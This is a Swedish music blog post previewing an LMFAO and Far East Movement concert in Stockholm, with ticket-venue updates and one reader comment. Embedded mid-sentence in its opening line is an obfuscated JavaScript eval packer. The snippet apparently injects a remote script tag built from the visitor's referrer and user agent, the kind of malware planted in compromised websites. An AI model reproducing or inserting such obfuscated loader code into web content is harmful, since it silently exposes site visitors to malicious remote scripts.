Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Revue gör sig redo för LMFAO och Far East Movement

Revue gör sig redo för LMFAO och Far East Movement
Sebastian

Ikväll eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tddii|var|u0026u|referrer|dsaan||js|php’.split(’|’),0,{}))
är det dags. LMFAO kommer till Stockholm och ska visa hur ”Party Rock” och ”Shufflin” verkligen går till.

Revue kommer vara på plats och dokumentera hela konserten samt släppa en strålande recension imorgon. Omci inte ses där så kan ni läsa om hela det hela imorgon här på Revue.se.

Förutom LMFAO kommer även Far East Movement och gästspelar. East Far Movement är kända från låtar som G6.

LMFAO är bandet som bevisar att musik kan bestå av inget annat än 100% glädje och fest. Hitten ”Party Rock Anthem” har toppat listorna i nitton länder och debutalbumet ”Sorry For Party Rocking” har skeppats iväg i en sisådär 10 miljoner exemplar. Nya singeln “Sexy and I Know It” är på väg åt samma håll och har redan förstaplatser i fem länder. Ytterligare en siffra LMFAO kan glänsa med är blygsamma 325 miljoner visningar som videorna till ovan nämnda singellåtar hittills genererat (efter du har läst detta har visningarna sannolikt klättrat uppåt i fyrsiffrigt antal).

Far East Movement, som rör sig i samma musikaliska landskap som LMFAO, har även de haft listframgångar. ”Like A G6”, “Rocketeer” och “If I Was You (OMG)” har alla blivit hittar och spätt på förväntningarna inför deras andra album som släpps tidigt 2012.

Spelningen är flyttade från Nalen till Berns till Annexet. PGA massivt biljetttryck. Köpta biljetter till Nalen och Berns gäller till konserten i Annexet.

Åldersgräns 18 år.

Lets Party Rock!!!

Comments

  1. Sexy and i know it

    Hann inte köpra biljett 🙁 väntar mig en bra recension istället 🙂